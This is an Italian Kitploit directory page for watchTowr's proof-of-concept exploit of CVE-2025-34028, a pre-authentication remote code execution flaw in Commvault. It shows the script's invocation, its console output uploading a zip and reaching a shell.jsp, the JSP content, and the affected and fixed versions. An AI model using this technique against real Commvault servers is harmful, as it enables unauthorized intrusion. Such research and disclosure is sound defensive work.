Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028 — Proof-of-concept exploit per CVE-2025-34028, che dimostra l'esecuzione remota di codice pre-autenticata sulle interfacce web di Commvault tramite caricamento di JSP malevolo. | Kitploit
Strumenti/GitHubGitHub/watchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028

watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028

Proof-of-concept exploit per CVE-2025-34028, che dimostra l'esecuzione remota di codice pre-autenticata sulle interfacce web di Commvault tramite caricamento di JSP malevolo.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
21921 anno faRevisionato da Kitploit
Condividi

CVE-2025-34028

Una prova di concetto di Remote Code Execution pre-autenticata per Commvault

Consulta il nostro blog post per i dettagli tecnici

Rilevamento in azione

root@kitploit:~
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

Descrizione

Questo script è una prova di concetto per CVE-2025-34028, relativo alle interfacce web di Commvault. Caricando un file zip contenente un file .jsp per l'esecuzione di codice, il file zip viene caricato in una directory pubblicamente accessibile e l'utente di sistema viene dettagliato nella risposta. Ulteriori dettagli sono descritti nel nostro [blog post] (https://labs.watchtowr.com/).

Nota

Lo script PoC utilizza un file zip hardcoded contenente i seguenti file:

  • /ccApp/index.html
  • shell.jsp

Contenuto di Shell.jsp:

root@kitploit:~
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>

Versioni affette

  • Commvault Windows e Linux 11.38.0 - 11.38.19

Versioni corrette

  • Commvault Windows e Linux 11.38.20 a partire dal 10 aprile 2025
  • Commvault Windows e Linux 11.38.25 a partire dal 10 aprile 2025

Maggiori dettagli su Commvault Advisory

Segui watchTowr Labs

Per le ultime ricerche sulla sicurezza, segui il team watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Scarica lo strumento